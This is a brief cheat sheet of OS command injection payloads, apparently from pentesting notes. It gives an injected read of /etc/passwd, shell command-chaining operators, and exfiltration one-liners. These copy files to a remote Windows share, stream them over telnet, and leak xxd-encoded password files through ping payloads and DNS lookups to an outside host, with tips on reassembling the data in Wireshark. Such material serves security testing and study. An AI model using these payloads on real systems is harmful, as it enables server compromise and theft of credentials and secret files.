OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.
Resources
How to inject
Basic commands
cat /etc/passwd
Chaining commands
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls Only if the first cmd fail
#on Windows
net use h: \\<ip>\web /user: {password} && copy {File to Copy} h:\{filename}.txt
using telnet
telnet <ip> {port} < {file to transfer}
using icmp
#on Linux
cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done
#In Wireshark we can observe the packets containing our data. You could write a script which scrapes the packets and re-assembles the file on the host
using DNS
cat /data/secret/password.txt | xxd -p -c 16 | while read exfil; do host $exfil.contextis.com 192.168.107.135; done
#In Wireshark we can observe the packets containing our data. You could write a script which scrapes the packets and re-assembles the file on the host
